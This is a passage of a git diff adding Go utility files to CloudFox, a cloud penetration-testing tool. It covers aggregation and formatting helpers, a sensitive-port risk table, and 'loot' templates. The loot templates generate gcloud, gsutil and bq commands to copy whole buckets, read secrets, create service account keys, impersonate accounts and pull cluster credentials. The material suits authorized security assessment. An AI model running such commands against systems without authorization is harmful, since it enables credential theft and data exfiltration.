any](projectMap map[string][]T, transform func(projectID string, item T) R) []R { + var result []R + for projectID, items := range projectMap { + for _, item := range items { + result = append(result, transform(projectID, item)) + } + } + return result +} + +// CountByProject returns a count of items per project +func CountByProject[T any](projectMap map[string][]T) map[string]int { + counts := make(map[string]int) + for projectID, items := range projectMap { + counts[projectID] = len(items) + } + return counts +} + +// TotalCount returns the total count across all projects +func TotalCount[T any](projectMap map[string][]T) int { + total := 0 + for _, items := range projectMap { + total += len(items) + } + return total +} + +// FilterByProject returns items only from specified projects +func FilterByProject[T any](projectMap map[string][]T, projectIDs []string) []T { + projectSet := make(map[string]bool) + for _, pid := range projectIDs { + projectSet[pid] = true + } + + var result []T + for projectID, items := range projectMap { + if projectSet[projectID] { + result = append(result, items...) + } + } + return result +} + +// FilterItems returns items that match the predicate +func FilterItems[T any](items []T, predicate func(T) bool) []T { + var result []T + for _, item := range items { + if predicate(item) { + result = append(result, item) + } + } + return result +} + +// MapItems transforms each item using the provided function +func MapItems[T any, R any](items []T, transform func(T) R) []R { + result := make([]R, len(items)) + for i, item := range items { + result[i] = transform(item) + } + return result +} + +// GroupBy groups items by a key extracted from each item +func GroupBy[T any, K comparable](items []T, keyFunc func(T) K) map[K][]T { + result := make(map[K][]T) + for _, item := range items { + key := keyFunc(item) + result[key] = append(result[key], item) + } + return result +} + +// UniqueStrings returns unique strings from a slice +func UniqueStrings(items []string) []string { + seen := make(map[string]bool) + var result []string + for _, item := range items { + if !seen[item] { + seen[item] = true + result = append(result, item) + } + } + return result +} + +// FlattenStringSlices flattens a slice of string slices into a single slice +func FlattenStringSlices(slices [][]string) []string { + var result []string + for _, slice := range slices { + result = append(result, slice...) + } + return result +} + +// CountByField counts items grouped by a field value +func CountByField[T any](items []T, fieldFunc func(T) string) map[string]int { + counts := make(map[string]int) + for _, item := range items { + key := fieldFunc(item) + counts[key]++ + } + return counts +} + +// SortedKeys returns the keys of a map in sorted order +// Note: This only works with string keys +func SortedKeys(m map[string]int) []string { + keys := make([]string, 0, len(m)) + for k := range m { + keys = append(keys, k) + } + // Simple bubble sort for small maps + for i := 0; i < len(keys); i++ { + for j := i + 1; j < len(keys); j++ { + if keys[i] > keys[j] { + keys[i], keys[j] = keys[j], keys[i] + } + } + } + return keys +} + +// First returns the first item matching the predicate, or nil if none found +func First[T any](items []T, predicate func(T) bool) *T { + for i := range items { + if predicate(items[i]) { + return &items[i] + } + } + return nil +} + +// Any returns true if any item matches the predicate +func Any[T any](items []T, predicate func(T) bool) bool { + for _, item := range items { + if predicate(item) { + return true + } + } + return false +} + +// All returns true if all items match the predicate +func All[T any](items []T, predicate func(T) bool) bool { + for _, item := range items { + if !predicate(item) { + return false + } + } + return true +} + +// None returns true if no items match the predicate +func None[T any](items []T, predicate func(T) bool) bool { + return !Any(items, predicate) +} + +// Contains checks if a slice contains a specific value +func Contains[T comparable](items []T, value T) bool { + for _, item := range items { + if item == value { + return true + } + } + return false +} + +// ContainsString checks if a string slice contains a specific string +func ContainsString(items []string, value string) bool { + return Contains(items, value) +} + +// Deduplicate removes duplicate items from a slice (preserves order) +func Deduplicate[T comparable](items []T) []T { + seen := make(map[T]bool) + var result []T + for _, item := range items { + if !seen[item] { + seen[item] = true + result = append(result, item) + } + } + return result +} + +// Partition splits items into two slices based on a predicate +// First slice contains items where predicate is true, +// second slice contains items where predicate is false +func Partition[T any](items []T, predicate func(T) bool) ([]T, []T) { + var trueItems, falseItems []T + for _, item := range items { + if predicate(item) { + trueItems = append(trueItems, item) + } else { + falseItems = append(falseItems, item) + } + } + return trueItems, falseItems +} diff --git a/gcp/shared/doc.go b/gcp/shared/doc.go new file mode 100644 index 00000000..d1575572 --- /dev/null +++ b/gcp/shared/doc.go @@ -0,0 +1,117 @@ +// Package shared provides common utilities for GCP CloudFox modules. +// +// This package contains helper functions and types that are used across multiple +// GCP command modules to reduce code duplication and ensure consistency. +// +// # Package Organization +// +// The shared package is organized into several files by functionality: +// +// - principals.go: IAM principal type detection and parsing utilities +// - formatting.go: Table formatting helpers (bool to string, truncation, etc.) +// - risk.go: Risk assessment constants, types, and utilities +// - loot.go: Loot file management and command formatting helpers +// - aggregate.go: Generic aggregation utilities for per-project data +// +// # Principal Utilities +// +// The principals.go file provides functions for working with GCP IAM principals: +// +// // Get the type of a principal +// principalType := shared.GetPrincipalType("user:admin@example.com") // "User" +// +// // Check if a principal is public +// if shared.IsPublicPrincipal("allUsers") { +// // Handle public access +// } +// +// // Extract email from principal string +// email := shared.ExtractPrincipalEmail("serviceAccount:sa@project.iam.gserviceaccount.com") +// +// # Formatting Utilities +// +// The formatting.go file provides helpers for table and output formatting: +// +// // Convert bool to display string +// shared.BoolToYesNo(true) // "Yes" +// shared.BoolToEnabled(false) // "Disabled" +// +// // Format lists for display +// shared.FormatList([]string{"a", "b", "c", "d", "e"}, 3) // "a, b, c (+2 more)" +// +// // Extract resource names from paths +// shared.ExtractResourceName("projects/my-project/locations/us-central1/functions/my-func") +// // Returns: "my-func" +// +// # Risk Assessment +// +// The risk.go file provides standardized risk assessment utilities: +// +// // Use standard risk level constants +// if riskLevel == shared.RiskCritical { +// // Handle critical risk +// } +// +// // Track risk counts +// counts := &shared.RiskCounts{} +// counts.Add(shared.RiskHigh) +// counts.Add(shared.RiskMedium) +// fmt.Println(counts.Summary()) // "1 HIGH, 1 MEDIUM" +// +// // Assess specific risks +// level := shared.AssessRoleRisk("roles/owner") // "CRITICAL" +// +// # Loot File Management +// +// The loot.go file provides helpers for creating and managing loot files: +// +// // Create a loot file manager +// lootMgr := shared.NewLootFileManager() +// +// // Initialize and add content +// lootMgr.CreateLootFile(projectID, "buckets-commands", +// shared.LootHeaderCommands("buckets", "Storage bucket access commands")) +// lootMgr.AddToLoot(projectID, "buckets-commands", +// shared.FormatGcloudCommand("List bucket", "gsutil ls gs://my-bucket/")) +// +// // Get formatted command strings +// cmd := shared.GcloudAccessSecretVersion("my-project", "my-secret", "latest") +// +// # Aggregation Utilities +// +// The aggregate.go file provides generic functions for combining per-project data: +// +// // Aggregate from per-project maps +// allBuckets := shared.AggregateFromProjects(projectBucketsMap) +// +// // Filter and transform +// publicBuckets := shared.FilterItems(allBuckets, func(b Bucket) bool { +// return b.IsPublic +// }) +// +// // Group by field +// bucketsByRegion := shared.GroupBy(allBuckets, func(b Bucket) string { +// return b.Region +// }) +// +// # Usage in Modules +// +// Import the shared package in GCP command modules: +// +// import ( +// "github.com/BishopFox/cloudfox/gcp/shared" +// ) +// +// func (m *MyModule) processResource(resource Resource) { +// principalType := shared.GetPrincipalType(resource.Principal) +// riskLevel := shared.AssessRoleRisk(resource.Role) +// +// if shared.IsPublicPrincipal(resource.Principal) { +// m.addToLoot(shared.FormatExploitEntry( +// "Public Access", +// "Resource is publicly accessible", +// shared.GsutilList(resource.BucketName), +// )) +// } +// } +package shared diff --git a/gcp/shared/formatting.go b/gcp/shared/formatting.go new file mode 100644 index 00000000..fc11fa68 --- /dev/null +++ b/gcp/shared/formatting.go @@ -0,0 +1,219 @@ +package shared + +import ( + "fmt" + "strings" +) + +// BoolToYesNo converts a boolean to "Yes" or "No" string. +// Useful for table display where boolean values should be human-readable. +func BoolToYesNo(b bool) string { + if b { + return "Yes" + } + return "No" +} + +// BoolToEnabled converts a boolean to "Enabled" or "Disabled" string. +func BoolToEnabled(b bool) string { + if b { + return "Enabled" + } + return "Disabled" +} + +// BoolToCheck converts a boolean to a checkmark or empty string. +// Useful for table columns showing presence/absence of a feature. +func BoolToCheck(b bool) string { + if b { + return "✓" + } + return "" +} + +// BoolToStatus converts a boolean to "Active" or "Inactive" string. +func BoolToStatus(b bool) string { + if b { + return "Active" + } + return "Inactive" +} + +// TruncateString truncates a string to maxLen characters, adding "..." if truncated. +func TruncateString(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + if maxLen <= 3 { + return s[:maxLen] + } + return s[:maxLen-3] + "..." +} + +// TruncateMiddle truncates a string in the middle, keeping the start and end. +// Useful for long resource names where both prefix and suffix are informative. +func TruncateMiddle(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + if maxLen <= 5 { + return s[:maxLen] + } + keepLen := (maxLen - 3) / 2 + return s[:keepLen] + "..." + s[len(s)-keepLen:] +} + +// FormatList formats a slice of strings for table display. +// If the list is longer than maxItems, it truncates and adds a count. +// +// Examples: +// - ["a", "b"] -> "a, b" +// - ["a", "b", "c", "d", "e"] with maxItems=3 -> "a, b, c (+2 more)" +func FormatList(items []string, maxItems int) string { + if len(items) == 0 { + return "-" + } + if maxItems <= 0 || len(items) <= maxItems { + return strings.Join(items, ", ") + } + shown := strings.Join(items[:maxItems], ", ") + return fmt.Sprintf("%s (+%d more)", shown, len(items)-maxItems) +} + +// FormatCount formats a count with appropriate singular/plural suffix. +// +// Examples: +// - FormatCount(0, "item", "items") -> "0 items" +// - FormatCount(1, "item", "items") -> "1 item" +// - FormatCount(5, "item", "items") -> "5 items" +func FormatCount(count int, singular, plural string) string { + if count == 1 { + return fmt.Sprintf("%d %s", count, singular) + } + return fmt.Sprintf("%d %s", count, plural) +} + +// FormatBytes formats a byte count as a human-readable string. +func FormatBytes(bytes int64) string { + const unit = 1024 + if bytes < unit { + return fmt.Sprintf("%d B", bytes) + } + div, exp := int64(unit), 0 + for n := bytes / unit; n >= unit; n /= unit { + div *= unit + exp++ + } + return fmt.Sprintf("%.1f %cB", float64(bytes)/float64(div), "KMGTPE"[exp]) +} + +// DefaultString returns the value if non-empty, otherwise returns the default. +func DefaultString(value, defaultValue string) string { + if value == "" { + return defaultValue + } + return value +} + +// DefaultInt returns the value if non-zero, otherwise returns the default. +func DefaultInt(value, defaultValue int) int { + if value == 0 { + return defaultValue + } + return value +} + +// JoinNonEmpty joins non-empty strings with the given separator. +// Empty strings are filtered out before joining. +func JoinNonEmpty(sep string, items ...string) string { + var nonEmpty []string + for _, item := range items { + if item != "" { + nonEmpty = append(nonEmpty, item) + } + } + return strings.Join(nonEmpty, sep) +} + +// ExtractResourceName extracts the last component from a resource path. +// GCP resource names often have format: projects/PROJECT/locations/LOCATION/resources/NAME +// +// Examples: +// - "projects/my-project/locations/us-central1/functions/my-func" -> "my-func" +// - "my-resource" -> "my-resource" +func ExtractResourceName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +// ExtractProjectFromResourceName extracts the project ID from a full resource name. +// GCP resources typically have format: projects/PROJECT_ID/... +// +// Returns empty string if project cannot be extracted. +func ExtractProjectFromResourceName(resourceName string) string { + parts := strings.Split(resourceName, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +// ExtractLocationFromResourceName extracts the location from a full resource name. +// GCP resources often have format: projects/PROJECT/locations/LOCATION/... +// +// Returns empty string if location cannot be extracted. +func ExtractLocationFromResourceName(resourceName string) string { + parts := strings.Split(resourceName, "/") + for i, part := range parts { + if (part == "locations" || part == "regions" || part == "zones") && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +// SanitizeForTable removes or replaces characters that may break table formatting. +func SanitizeForTable(s string) string { + // Replace newlines and tabs with spaces + s = strings.ReplaceAll(s, "\n", " ") + s = strings.ReplaceAll(s, "\r", " ") + s = strings.ReplaceAll(s, "\t", " ") + // Collapse multiple spaces + for strings.Contains(s, " ") { + s = strings.ReplaceAll(s, " ", " ") + } + return strings.TrimSpace(s) +} + +// FormatPermissionList formats a list of permissions for display. +// Optionally highlights dangerous permissions. +func FormatPermissionList(permissions []string, maxShow int) string { + if len(permissions) == 0 { + return "-" + } + return FormatList(permissions, maxShow) +} + +// FormatRoleShort shortens a role name for table display. +// Removes the "roles/" prefix if present. +// +// Examples: +// - "roles/owner" -> "owner" +// - "roles/storage.admin" -> "storage.admin" +// - "projects/my-project/roles/customRole" -> "customRole" +func FormatRoleShort(role string) string { + if strings.HasPrefix(role, "roles/") { + return strings.TrimPrefix(role, "roles/") + } + // Handle custom roles: projects/PROJECT/roles/ROLE or organizations/ORG/roles/ROLE + parts := strings.Split(role, "/roles/") + if len(parts) == 2 { + return parts[1] + } + return role +} diff --git a/gcp/shared/loot.go b/gcp/shared/loot.go new file mode 100644 index 00000000..c527a5cd --- /dev/null +++ b/gcp/shared/loot.go @@ -0,0 +1,273 @@ +package shared + +import ( + "fmt" + "strings" + + "github.com/BishopFox/cloudfox/internal" +) + +// LootFileManager helps manage loot file creation and content addition +// for GCP modules with per-project organization. +type LootFileManager struct { + // LootMap stores loot files organized by projectID -> lootFileName -> LootFile + LootMap map[string]map[string]*internal.LootFile +} + +// NewLootFileManager creates a new LootFileManager +func NewLootFileManager() *LootFileManager { + return &LootFileManager{ + LootMap: make(map[string]map[string]*internal.LootFile), + } +} + +// InitializeProject ensures the project has an initialized loot map +func (l *LootFileManager) InitializeProject(projectID string) { + if l.LootMap[projectID] == nil { + l.LootMap[projectID] = make(map[string]*internal.LootFile) + } +} + +// CreateLootFile creates a new loot file for a project with a header +func (l *LootFileManager) CreateLootFile(projectID, fileName, header string) { + l.InitializeProject(projectID) + l.LootMap[projectID][fileName] = &internal.LootFile{ + Name: fileName, + Contents: header, + } +} + +// AddToLoot adds content to a loot file +func (l *LootFileManager) AddToLoot(projectID, fileName, content string) { + l.InitializeProject(projectID) + if lootFile, exists := l.LootMap[projectID][fileName]; exists && lootFile != nil { + lootFile.Contents += content + } +} + +// GetLootFile retrieves a loot file for a project +func (l *LootFileManager) GetLootFile(projectID, fileName string) *internal.LootFile { + if projectLoot, exists := l.LootMap[projectID]; exists { + return projectLoot[fileName] + } + return nil +} + +// GetAllLootFiles returns all loot files across all projects as a flat slice +func (l *LootFileManager) GetAllLootFiles() []internal.LootFile { + var allLoot []internal.LootFile + for _, projectLoot := range l.LootMap { + for _, lootFile := range projectLoot { + if lootFile != nil && lootFile.Contents != "" { + allLoot = append(allLoot, *lootFile) + } + } + } + return allLoot +} + +// GetProjectLootFiles returns all loot files for a specific project +func (l *LootFileManager) GetProjectLootFiles(projectID string) []internal.LootFile { + var lootFiles []internal.LootFile + if projectLoot, exists := l.LootMap[projectID]; exists { + for _, lootFile := range projectLoot { + if lootFile != nil && lootFile.Contents != "" { + lootFiles = append(lootFiles, *lootFile) + } + } + } + return lootFiles +} + +// Standard loot file name suffixes +const ( + LootSuffixCommands = "commands" + LootSuffixExploitation = "exploitation" + LootSuffixEnumeration = "enumeration" + LootSuffixPrivesc = "privesc" + LootSuffixLateralMove = "lateral-movement" + LootSuffixDataExfil = "data-exfiltration" + LootSuffixHighPrivilege = "high-privilege" + LootSuffixSecurityRisks = "security-risks" + LootSuffixCredentials = "credentials" + LootSuffixSensitiveFiles = "sensitive-files" +) + +// LootFileName generates a standardized loot file name +func LootFileName(moduleName, suffix string) string { + return moduleName + "-" + suffix +} + +// Standard loot file headers + +// LootHeaderCommands returns a standard header for command loot files +func LootHeaderCommands(moduleName, description string) string { + return fmt.Sprintf(`# %s - Exploitation Commands +# Generated by CloudFox +# %s +# +# Execute these commands to interact with discovered resources. +# Always ensure you have proper authorization before running these commands. + +`, moduleName, description) +} + +// LootHeaderEnumeration returns a standard header for enumeration loot files +func LootHeaderEnumeration(moduleName, description string) string { + return fmt.Sprintf(`# %s - Further Enumeration Commands +# Generated by CloudFox +# %s +# +# Execute these commands to gather additional information. + +`, moduleName, description) +} + +// LootHeaderSecurityRisks returns a standard header for security risk loot files +func LootHeaderSecurityRisks(moduleName string) string { + return fmt.Sprintf(`# %s - Security Risks +# Generated by CloudFox +# +# This file lists potential security issues discovered during enumeration. + +`, moduleName) +} + +// Command formatting helpers + +// FormatGcloudCommand formats a gcloud CLI command for loot files +func FormatGcloudCommand(comment, command string) string { + if comment != "" { + return fmt.Sprintf("# %s\n%s\n\n", comment, command) + } + return fmt.Sprintf("%s\n\n", command) +} + +// FormatGsutilCommand formats a gsutil command for loot files +func FormatGsutilCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatBqCommand formats a bq CLI command for loot files +func FormatBqCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatKubectlCommand formats a kubectl command for loot files +func FormatKubectlCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatCurlCommand formats a curl command for loot files +func FormatCurlCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatLootSection formats a section with a header and multiple commands +func FormatLootSection(sectionHeader string, commands []string) string { + var sb strings.Builder + sb.WriteString(fmt.Sprintf("#############################################\n")) + sb.WriteString(fmt.Sprintf("# %s\n", sectionHeader)) + sb.WriteString(fmt.Sprintf("#############################################\n\n")) + for _, cmd := range commands { + sb.WriteString(cmd) + sb.WriteString("\n") + } + sb.WriteString("\n") + return sb.String() +} + +// FormatExploitEntry formats a single exploitation entry for loot files +func FormatExploitEntry(title, description, command string) string { + var sb strings.Builder + sb.WriteString(fmt.Sprintf("#############################################\n")) + sb.WriteString(fmt.Sprintf("# %s\n", title)) + if description != "" { + sb.WriteString(fmt.Sprintf("# %s\n", description)) + } + sb.WriteString(fmt.Sprintf("#############################################\n")) + sb.WriteString(command) + sb.WriteString("\n\n") + return sb.String() +} + +// FormatRiskEntry formats a risk finding for loot files +func FormatRiskEntry(riskLevel, resourceType, resourceName, description string) string { + return fmt.Sprintf("[%s] %s: %s\n Description: %s\n\n", + riskLevel, resourceType, resourceName, description) +} + +// Common GCP command templates + +// GcloudDescribeInstance returns a gcloud command to describe an instance +func GcloudDescribeInstance(projectID, zone, instanceName string) string { + return fmt.Sprintf("gcloud compute instances describe %s --zone=%s --project=%s", + instanceName, zone, projectID) +} + +// GcloudSSHInstance returns a gcloud command to SSH into an instance +func GcloudSSHInstance(projectID, zone, instanceName string) string { + return fmt.Sprintf("gcloud compute ssh %s --zone=%s --project=%s", + instanceName, zone, projectID) +} + +// GsutilList returns a gsutil command to list bucket contents +func GsutilList(bucketName string) string { + return fmt.Sprintf("gsutil ls -la gs://%s/", bucketName) +} + +// GsutilCopy returns a gsutil command to copy from a bucket +func GsutilCopy(bucketName, objectPath, localPath string) string { + if objectPath == "" { + return fmt.Sprintf("gsutil -m cp -r gs://%s/* %s", bucketName, localPath) + } + return fmt.Sprintf("gsutil cp gs://%s/%s %s", bucketName, objectPath, localPath) +} + +// GcloudAccessSecretVersion returns a gcloud command to access a secret +func GcloudAccessSecretVersion(projectID, secretName, version string) string { + if version == "" { + version = "latest" + } + return fmt.Sprintf("gcloud secrets versions access %s --secret=%s --project=%s", + version, secretName, projectID) +} + +// GcloudListSAKeys returns a gcloud command to list service account keys +func GcloudListSAKeys(projectID, saEmail string) string { + return fmt.Sprintf("gcloud iam service-accounts keys list --iam-account=%s --project=%s", + saEmail, projectID) +} + +// GcloudCreateSAKey returns a gcloud command to create a service account key +func GcloudCreateSAKey(projectID, saEmail, outputFile string) string { + return fmt.Sprintf("gcloud iam service-accounts keys create %s --iam-account=%s --project=%s", + outputFile, saEmail, projectID) +} + +// GcloudImpersonateSA returns a gcloud command to impersonate a service account +func GcloudImpersonateSA(saEmail, command string) string { + return fmt.Sprintf("gcloud %s --impersonate-service-account=%s", command, saEmail) +} + +// GcloudGetClusterCredentials returns a gcloud command to get GKE cluster credentials +func GcloudGetClusterCredentials(projectID, location, clusterName string) string { + locFlag := "--region" + if !strings.Contains(location, "-") || len(strings.Split(location, "-")) == 3 { + locFlag = "--zone" + } + return fmt.Sprintf("gcloud container clusters get-credentials %s %s=%s --project=%s", + clusterName, locFlag, location, projectID) +} + +// BqQuery returns a bq command to run a query +func BqQuery(projectID, query string) string { + return fmt.Sprintf("bq query --project_id=%s --use_legacy_sql=false '%s'", + projectID, query) +} + +// BqExtract returns a bq command to extract a table to GCS +func BqExtract(projectID, dataset, table, gcsPath string) string { + return fmt.Sprintf("bq extract --project_id=%s %s.%s %s", + projectID, dataset, table, gcsPath) +} diff --git a/gcp/shared/network.go b/gcp/shared/network.go new file mode 100644 index 00000000..e9e7979b --- /dev/null +++ b/gcp/shared/network.go @@ -0,0 +1,346 @@ +package shared + +import ( + "fmt" + "strconv" + "strings" +) + +// Public CIDR constants +const ( + CIDRAllIPv4 = "0.0.0.0/0" + CIDRAllIPv6 = "::/0" + // Broad ranges that are effectively public + CIDRHalfIPv4Low = "0.0.0.0/1" + CIDRHalfIPv4High = "128.0.0.0/1" +) + +// IsPublicCIDR checks if a CIDR range represents public/internet access. +// Returns true for 0.0.0.0/0, ::/0, and other effectively-public ranges. +func IsPublicCIDR(cidr string) bool { + cidr = strings.TrimSpace(cidr) + switch cidr { + case CIDRAllIPv4, CIDRAllIPv6, CIDRHalfIPv4Low, CIDRHalfIPv4High: + return true + } + return false +} + +// HasPublicCIDR checks if any CIDR in the slice represents public access. +func HasPublicCIDR(cidrs []string) bool { + for _, cidr := range cidrs { + if IsPublicCIDR(cidr) { + return true + } + } + return false +} + +// IsPrivateIP checks if an IP address is in a private range. +// Private ranges: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 +func IsPrivateIP(ip string) bool { + // Handle CIDR notation + if idx := strings.Index(ip, "/"); idx != -1 { + ip = ip[:idx] + } + + parts := strings.Split(ip, ".") + if len(parts) != 4 { + return false + } + + first, err := strconv.Atoi(parts[0]) + if err != nil { + return false + } + + // 10.0.0.0/8 + if first == 10 { + return true + } + + // 172.16.0.0/12 + if first == 172 { + second, err := strconv.Atoi(parts[1]) + if err != nil { + return false + } + if second >= 16 && second <= 31 { + return true + } + } + + // 192.168.0.0/16 + if first == 192 { + second, err := strconv.Atoi(parts[1]) + if err != nil { + return false + } + if second == 168 { + return true + } + } + + return false +} + +// SensitivePort represents a port with security implications +type SensitivePort struct { + Port int + Protocol string + Service string + Risk string + Description string +} + +// SensitivePorts maps port numbers to their security information +var SensitivePorts = map[int]SensitivePort{ + // Remote Access + 22: {22, "TCP", "SSH", RiskHigh, "Remote shell access"}, + 23: {23, "TCP", "Telnet", RiskCritical, "Unencrypted remote access"}, + 3389: {3389, "TCP", "RDP", RiskHigh, "Remote Desktop Protocol"}, + 5900: {5900, "TCP", "VNC", RiskHigh, "Virtual Network Computing"}, + 5985: {5985, "TCP", "WinRM-HTTP", RiskHigh, "Windows Remote Management (HTTP)"}, + 5986: {5986, "TCP", "WinRM-HTTPS", RiskMedium, "Windows Remote Management (HTTPS)"}, + + // Databases + 3306: {3306, "TCP", "MySQL", RiskHigh, "MySQL database"}, + 5432: {5432, "TCP", "PostgreSQL", RiskHigh, "PostgreSQL database"}, + 1433: {1433, "TCP", "MSSQL", RiskHigh, "Microsoft SQL Server"}, + 1521: {1521, "TCP", "Oracle", RiskHigh, "Oracle database"}, + 27017: {27017, "TCP", "MongoDB", RiskHigh, "MongoDB database"}, + 6379: {6379, "TCP", "Redis", RiskHigh, "Redis (often no auth)"}, + 9042: {9042, "TCP", "Cassandra", RiskMedium, "Cassandra database"}, + 5984: {5984, "TCP", "CouchDB", RiskMedium, "CouchDB database"}, + 9200: {9200, "TCP", "Elasticsearch", RiskHigh, "Elasticsearch (often no auth)"}, + + // Web/API + 80: {80, "TCP", "HTTP", RiskMedium, "Unencrypted web traffic"}, + 443: {443, "TCP", "HTTPS", RiskLow, "Encrypted web traffic"}, + 8080: {8080, "TCP", "HTTP-Alt", RiskMedium, "Alternative HTTP"}, + 8443: {8443, "TCP", "HTTPS-Alt", RiskLow, "Alternative HTTPS"}, + + // Infrastructure + 53: {53, "TCP/UDP", "DNS", RiskMedium, "DNS queries/transfers"}, + 25: {25, "TCP", "SMTP", RiskMedium, "Email relay"}, + 110: {110, "TCP", "POP3", RiskMedium, "Email retrieval (unencrypted)"}, + 143: {143, "TCP", "IMAP", RiskMedium, "Email retrieval (unencrypted)"}, + 389: {389, "TCP", "LDAP", RiskHigh, "Directory services (unencrypted)"}, + 636: {636, "TCP", "LDAPS", RiskMedium, "Directory services (encrypted)"}, + 445: {445, "TCP", "SMB", RiskCritical, "Windows file sharing"}, + 137: {137, "UDP", "NetBIOS-NS", RiskHigh, "NetBIOS Name Service"}, + 138: {138, "UDP", "NetBIOS-DG", RiskHigh, "NetBIOS Datagram"}, + 139: {139, "TCP", "NetBIOS-SS", RiskHigh, "NetBIOS Session"}, + 111: {111, "TCP/UDP", "RPC", RiskHigh, "Remote Procedure Call"}, + 2049: {2049, "TCP/UDP", "NFS", RiskHigh, "Network File System"}, + + // Container/Orchestration + 2375: {2375, "TCP", "Docker-Unencrypted", RiskCritical, "Docker API (unencrypted)"}, + 2376: {2376, "TCP", "Docker-TLS", RiskMedium, "Docker API (TLS)"}, + 6443: {6443, "TCP", "Kubernetes-API", RiskHigh, "Kubernetes API server"}, + 10250: {10250, "TCP", "Kubelet", RiskHigh, "Kubelet API"}, + 10255: {10255, "TCP", "Kubelet-RO", RiskMedium, "Kubelet read-only API"}, + 2379: {2379, "TCP", "etcd", RiskCritical, "etcd (K8s secrets)"}, + + // Monitoring + 9090: {9090, "TCP", "Prometheus", RiskMedium, "Prometheus metrics"}, + 3000: {3000, "TCP", "Grafana", RiskMedium, "Grafana dashboard"}, + 8500: {8500, "TCP", "Consul", RiskMedium, "HashiCorp Consul"}, + + // Message Queues + 5672: {5672, "TCP", "AMQP", RiskMedium, "RabbitMQ"}, + 15672: {15672, "TCP", "RabbitMQ-Mgmt", RiskMedium, "RabbitMQ management"}, + 9092: {9092, "TCP", "Kafka", RiskMedium, "Apache Kafka"}, + + // Other + 11211: {11211, "TCP", "Memcached", RiskHigh, "Memcached (often no auth)"}, + 6666: {6666, "TCP", "IRC", RiskMedium, "IRC (potential backdoor)"}, + 4444: {4444, "TCP", "Metasploit", RiskCritical, "Common Metasploit port"}, +} + +// IsSensitivePort checks if a port is considered security-sensitive +func IsSensitivePort(port int) bool { + _, exists := SensitivePorts[port] + return exists +} + +// GetPortInfo returns information about a port if it's sensitive +func GetPortInfo(port int) (SensitivePort, bool) { + info, exists := SensitivePorts[port] + return info, exists +} + +// GetPortRisk returns the risk level for a port (or RiskLow if not sensitive) +func GetPortRisk(port int) string { + if info, exists := SensitivePorts[port]; exists { + return info.Risk + } + return RiskLow +} + +// AssessFirewallRuleRisk assesses the risk of a firewall rule based on its configuration +func AssessFirewallRuleRisk(isIngress bool, isPublic bool, allowsAllPorts bool, ports []int) string { + // Egress rules are generally lower risk + if !isIngress { + if isPublic && allowsAllPorts { + return RiskMedium + } + return RiskLow + } + + // Ingress rules from public internet + if isPublic { + if allowsAllPorts { + return RiskCritical // All ports from internet = critical + } + + // Check for sensitive ports + for _, port := range ports { + if info, exists := SensitivePorts[port]; exists { + if info.Risk == RiskCritical { + return RiskCritical + } + } + } + + // Any public ingress with specific ports is at least high risk + return RiskHigh + } + + // Internal ingress rules + if allowsAllPorts { + return RiskMedium + } + + return RiskLow +} + +// FirewallRuleIssues identifies security issues with a firewall rule +func FirewallRuleIssues(isIngress bool, isPublic bool, allowsAllPorts bool, ports []int, hasTargetTags bool, loggingEnabled bool) []string { + var issues []string + + if isIngress { + if isPublic { + issues = append(issues, "Allows traffic from 0.0.0.0/0 (internet)") + } + + if allowsAllPorts { + issues = append(issues, "Allows ALL ports") + } + + // Check for sensitive ports exposed to internet + if isPublic { + for _, port := range ports { + if info, exists := SensitivePorts[port]; exists { + issues = append(issues, fmt.Sprintf("Exposes %s (%d) to internet", info.Service, port)) + } + } + } + + if !hasTargetTags { + issues = append(issues, "No target tags - applies to ALL instances") + } + } + + if !loggingEnabled { + issues = append(issues, "Firewall logging disabled") + } + + return issues +} + +// FormatPortRange formats a port range for display +func FormatPortRange(startPort, endPort int) string { + if startPort == endPort { + return fmt.Sprintf("%d", startPort) + } + return fmt.Sprintf("%d-%d", startPort, endPort) +} + +// ParsePortRange parses a port range string like "80" or "8000-9000" +func ParsePortRange(portStr string) (start, end int, err error) { + portStr = strings.TrimSpace(portStr) + + if strings.Contains(portStr, "-") { + parts := strings.Split(portStr, "-") + if len(parts) != 2 { + return 0, 0, fmt.Errorf("invalid port range: %s", portStr) + } + start, err = strconv.Atoi(strings.TrimSpace(parts[0])) + if err != nil { + return 0, 0, err + } + end, err = strconv.Atoi(strings.TrimSpace(parts[1])) + if err != nil { + return 0, 0, err + } + return start, end, nil + } + + port, err := strconv.Atoi(portStr) + if err != nil { + return 0, 0, err + } + return port, port, nil +} + +// ExpandPortRanges expands port range strings to individual ports (up to a limit) +func ExpandPortRanges(portRanges []string, maxPorts int) []int { + var ports []int + seen := make(map[int]bool) + + for _, rangeStr := range portRanges { + start, end, err := ParsePortRange(rangeStr) + if err != nil { + continue + } + + for p := start; p <= end && len(ports) < maxPorts; p++ { + if !seen[p] { + seen[p] = true + ports = append(ports, p) + } + } + } + + return ports +} + +// Protocol constants +const ( + ProtocolTCP = "tcp" + ProtocolUDP = "udp" + ProtocolICMP = "icmp" + ProtocolAll = "all" +) + +// IsAllProtocols checks if the protocol specification allows all protocols +func IsAllProtocols(protocol string) bool { + protocol = strings.ToLower(strings.TrimSpace(protocol)) + return protocol == "all" || protocol == "*" || protocol == "" +} + +// NetworkEndpointType categorizes network endpoints +type NetworkEndpointType string + +const ( + EndpointTypePublicIP NetworkEndpointType = "Public IP" + EndpointTypePrivateIP NetworkEndpointType = "Private IP" + EndpointTypeLoadBalancer NetworkEndpointType = "Load Balancer" + EndpointTypeNAT NetworkEndpointType = "NAT Gateway" + EndpointTypeVPNTunnel NetworkEndpointType = "VPN Tunnel" + EndpointTypeInterconnect NetworkEndpointType = "Interconnect" + EndpointTypePrivateService NetworkEndpointType = "Private Service Connect" + EndpointTypeInternal NetworkEndpointType = "Internal" +) + +// CategorizeEndpoint determines the type of a network endpoint +func CategorizeEndpoint(ipOrURL string, isExternal bool) NetworkEndpointType { + if isExternal { + return EndpointTypePublicIP + } + if 